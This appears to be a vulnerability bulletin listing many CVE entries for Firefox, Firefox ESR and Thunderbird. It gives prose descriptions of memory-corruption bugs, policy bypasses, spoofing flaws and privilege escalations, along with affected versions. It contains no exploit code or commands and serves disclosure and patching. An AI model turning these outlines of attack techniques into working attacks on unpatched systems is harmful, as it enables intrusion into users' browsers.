If web content on a page is dragged onto portions of the browser UI, such as the tab bar, links can be opened that otherwise would not be allowed to open. This can allow malicious web content to open a locally stored file through "file:" URLs. This vulnerability affects Firefox < 56.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7812
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A "data:" URL loaded in a new tab did not inherit the Content Security Policy (CSP) of the original page, allowing for bypasses of the policy including the execution of JavaScript. In prior versions when "data:" documents also inherited the context of the original page this would allow for potential cross-site scripting (XSS) attacks. This vulnerability affects Firefox < 57.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7834
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
SVG loaded through "<img>" tags can use "<meta>" tags within the SVG data to set cookies for that page. This vulnerability affects Firefox < 57.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7837
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The web console and JavaScript debugger do not sanitize all output that can be hyperlinked. Both will display "chrome:" links as active, clickable hyperlinks in their output. Web sites should not be able to directly link to internal chrome pages. Additionally, the JavaScript debugger will display "javascript:" links, which users could be tricked into clicking by malicious sites. This vulnerability affects Firefox < 60.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5167
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
This vulnerability allows an attacker to use the Mozilla Maintenance Service to escalate privilege by having the Maintenance Service invoke the Mozilla Updater to run malicious local files. This vulnerability requires local system access and is a variant of MFSA2013-44. Note: this issue only affects Windows operating systems. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-5295
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox
 
Inside the JavaScript parser, a cast of an integer to a narrower type can result in data read from outside the buffer being parsed. This usually results in a non-exploitable crash, but can leak a limited amount of information from memory if it matches JavaScript identifier syntax. This vulnerability affects Firefox < 56.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7813
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Punycode format text will be displayed for entire qualified international domain names in some instances when a sub-domain triggers the punycode display instead of the primary domain being displayed in native script and the sub-domain only displaying as punycode. This could be used for limited spoofing attacks due to user confusion. This vulnerability affects Firefox < 57.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7838
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
JavaScript can be injected into an exported bookmarks file by placing JavaScript code into user-supplied tags in saved bookmarks. If the resulting exported HTML file is later opened in a browser this JavaScript will be executed. This could be used in social engineering and self-cross-site-scripting (self-XSS) attacks if users were convinced to add malicious tags to bookmarks, export them, and then open the resulting file. This vulnerability affects Firefox < 57.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7840
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The "mozAddonManager" allows for the installation of extensions from the CDN for addons.mozilla.org, a publicly accessible site. This could allow malicious extensions to install additional extensions from the CDN in combination with an XSS attack on Mozilla AMO sites. This vulnerability affects Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5393
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Development Tools panels of an extension are required to load URLs for the panels as relative URLs from the extension manifest file but this requirement was not enforced in all instances. This could allow the development tools panel for the extension to load a URL that it should not be able to access, including potentially privileged pages. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5112
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A maliciously crafted page loaded to the sidebar through a bookmark can reference a privileged chrome window and engage in limited JavaScript operations violating cross-origin protections. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9070
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when the thread for a Web Worker is freed from memory prematurely instead of from memory in the main thread while cancelling fetch operations. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5092
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Low descenders on some Tibetan characters in several fonts on OS X are clipped when rendered in the addressbar. When used as part of an Internationalized Domain Name (IDN) this can be used for domain name spoofing attacks. Note: This attack only affects OS X operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5121
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Data sent in multipart channels, such as the multipart/x-mixed-replace MIME type, will ignore the referrer-policy response header, leading to potential information disclosure for sites using this header. This vulnerability affects Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5385
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An issue where a "<select>" dropdown menu can be used to cover location bar content, resulting in potential spoofing attacks. This attack requires e10s to be enabled in order to function. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9076
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
WebExtensions could use popups and panels in the extension UI to load an "about:" privileged URL, violating security checks that disallow this behavior. This vulnerability affects Firefox < 56.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7816
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
When a new Firefox profile is created on 64-bit Windows installations, the sandbox for 64-bit NPAPI plugins is not enabled by default. Note: This issue only affects 64-bit Windows. 32-bit Windows and other operating systems are unaffected. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9072
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A potential integer overflow in the "DoCrypt" function of WebCrypto was identified. If a means was found of exploiting it, it could result in an out-of-bounds write. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5122
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A use-after-free during web animations when working with timelines resulting in a potentially exploitable crash. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9068
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when manipulating floating "first-letter" style elements, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5101
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
When the text of a specially formatted URL is dragged to the addressbar from page content, the displayed URL can be spoofed to show a different site than the one loaded. This allows for phishing attacks where a malicious page can spoof the identity of another site. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5111
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 57. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5090
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A previously installed malicious Android application which defines specific signature-level permissions used by Firefox can access API keys meant for Firefox only. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-9061
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Control characters prepended before "javascript:" URLs pasted in the addressbar can cause the leading characters to be ignored and the pasted JavaScript to be executed instead of being blocked. This could be used in social engineering and self-cross-site-scripting (self-XSS) attacks where users are convinced to copy and paste text into the addressbar. This vulnerability affects Firefox < 57.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7839
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- multiple_products

A use-after-free vulnerability in frame selection triggered by a combination of malicious script content and key presses by a user. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5460
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products

Memory safety bugs were reported in Firefox 52, Firefox ESR 45.8, Firefox ESR 52, and Thunderbird 52. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5429
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products

A buffer overflow can occur when the image renderer attempts to paint non-displayable SVG elements. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7786
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products

The Firefox installer on Windows can be made to load malicious DLL files stored in the same directory as the installer when it is run. This allows privileged execution if the installer is run with elevated privileges. Note: This attack only affects Windows operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7755
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products

A mechanism that uses AppCache to hijack a URL in a domain using fallback by serving the files from a sub-path on the domain. This has been addressed by requiring fallback files be inside the manifest directory. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7807
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products

Several fonts on OS X display some Tibetan and Arabic characters as whitespace. When used in the addressbar as part of an IDN this can be used for domain name spoofing attacks. Note: This attack only affects OS X operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7825
BID
SECTRACK
CONFIRM
CONFIRM
MLIST
GENTOO
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
During TLS 1.2 exchanges, handshake hashes are generated which point to a message buffer. This saved data is used for later messages but in some cases, the handshake transcript can exceed the space available in the current buffer, causing the allocation of a new buffer. This leaves a pointer pointing to the old, freed buffer, resulting in a use-after-free when handshake hashes are then calculated afterwards. This can result in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7805
BID
SECTRACK
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur while adjusting layout during SVG animations with text paths. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5155
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Characters from the "Canadian Syllabics" Unicode block can be mixed with characters from other Unicode blocks in the addressbar instead of being rendered as their raw "punycode" form, allowing for domain name spoofing attacks through character confusion. The current Unicode standard allows characters from "Aspirational Use Scripts" such as Canadian Syllabics to be mixed with Latin characters in the "moderately restrictive" IDN profile. We have changed Firefox behavior to match the upcoming Unicode version 10.0 which removes this category and treats them as "Limited Use Scripts." This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7764
BID
SECTRACK
MISC
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
JIT-spray targeting asm.js combined with a heap spray allows for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5400
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The JSON viewer in the Developer Tools uses insecure methods to create a communication channel for copying and viewing JSON or HTTP headers data, allowing for potential privilege escalation. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5390
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during specific user interactions with the input method editor (IME) in some languages due to how events are handled. This results in a potentially exploitable crash but would require specific user interaction to trigger. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7752
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A potential use-after-free found through fuzzing during DOM manipulation of SVG content. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5380
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A number of security vulnerabilities in the Graphite 2 library including out-of-bounds reads, buffer overflow reads and writes, and the use of uninitialized memory. These issues were addressed in Graphite 2 version 1.3.10. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7778
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
GENTOO
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The Mozilla Updater can be made to choose an arbitrary target working directory for output files resulting from the update process. This vulnerability requires local system access. Note: this issue only affects Windows operating systems. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-5294
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A mechanism to spoof the addressbar through the user interaction on the addressbar and the "onblur" event. The event could be used by script to affect text display to make the loaded site appear to be different from the one actually loaded within the addressbar. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5451
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Video files loaded video captions cross-origin without checking for the presence of CORS headers permitting such cross-origin use, leading to potential information disclosure for video captions. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5408
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds write vulnerability while decoding improperly formed BinHex format archives. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5443
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur in WebSockets when the object holding the connection is freed before the disconnection operation is finished. This results in an exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7800
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A same-origin policy bypass with local shortcut files to load arbitrary local content from disk. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-5291
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Mozilla developers backported selected changes in the Skia library. These changes correct memory corruption issues including invalid buffer reads and writes during graphic operations. This vulnerability affects Thunderbird ESR < 52.8, Thunderbird < 52.8, and Firefox ESR < 52.8.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5183
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
When a page's content security policy (CSP) header contains a "sandbox" directive, other directives are ignored. This results in the incorrect enforcement of CSP. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7803
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when reading an image observer during frame reconstruction after the observer has been freed. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-7784
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 53 and Firefox ESR 52.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5470
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Hashed codes of JavaScript objects are shared between pages. This allows for pointer leaks because an object's address can be discovered through hash codes, and also allows for data leakage of an object's content using these hash codes. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2017-5378
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A heap-buffer-overflow in Cairo when processing SVG content caused by compiler optimization, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2016-5296
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow was found during UTF8 to Unicode string conversion within JavaScript with extremely large amounts of data. This vulnerability requires the use of a malicious or vulnerable legacy extension in order to occur. This vulnerability affects Thunderbird ESR < 52.8, Thunderbird < 52.8, and Firefox ESR < 52.8.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5178
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 57 and Firefox ESR 52.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
Published: 2018-06-11 | CVSS Score: not yet calculated | CVE-2018-5089
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow will occur when viewing a certificate in the certificate manager if the certificate has an extremely long object identifier (OID). This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7792
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur during mouse event handling due to issues with multiprocess support. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5103
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory corruption resulting in a potentially exploitable crash during WebGL functions using a vector constructor with a varying array within libGLES. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.
2018-06-11
not yet calculated
CVE-2016-9897
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 58 and Firefox ESR 52.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.7, Firefox ESR < 52.7, and Firefox < 59.
2018-06-11
not yet calculated
CVE-2018-5125
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The destructor function for the "WindowsDllDetourPatcher" class can be re-purposed by malicious code in concert with another vulnerability to write arbitrary data to an attacker controlled location in memory. This can be used to bypass existing memory protections in this situation. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7804
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 56 and Firefox ESR 52.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.
2018-06-11
not yet calculated
CVE-2017-7826
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Certain response codes in FTP connections can result in the use of uninitialized values for ports in FTP operations. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
2018-06-11
not yet calculated
CVE-2017-5405
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read in WebGL with a maliciously crafted "ImageInfo" object during WebGL operations. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7754
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 55 and Firefox ESR 52.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.
2018-06-11
not yet calculated
CVE-2017-7810
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during XSLT processing due to a failure to propagate error conditions during matching while evaluating context, leading to objects being used when they no longer exist. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5440
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Use-after-free while manipulating XSL in XSLT documents. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5376
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free and use-after-scope vulnerability when logging errors from headers for XML HTTP Requests (XHR). This could result in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7756
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A mechanism to bypass file system access protections in the sandbox to use the file picker to access different files than those selected in the file picker through the use of relative paths. This allows for read-only access to the local file system. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5454
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in the Media Decoder when working with media files when some events are fired after the media elements are freed from memory. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5396
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in IndexedDB when one of its objects is destroyed in memory while a method on it is still being executed. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7757
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 49 and Firefox ESR 45.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.
2018-06-11
not yet calculated
CVE-2016-5290
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
During DOM manipulations of the accessibility tree through script, the DOM tree can become out of sync with the accessibility tree, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5464
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when manipulating the DOM during the resize event of an image element. If these elements have been freed due to a lack of strong references, a potentially exploitable crash may occur when the freed elements are accessed. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7802
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read vulnerability with the Opus encoder when the number of channels in an audio stream changes while the encoder is in use. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7758
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow can occur when manipulating the SVG "animatedPathSegList" through script. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.7, Firefox ESR < 52.7, and Firefox < 59.
2018-06-11
not yet calculated
CVE-2018-5127
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
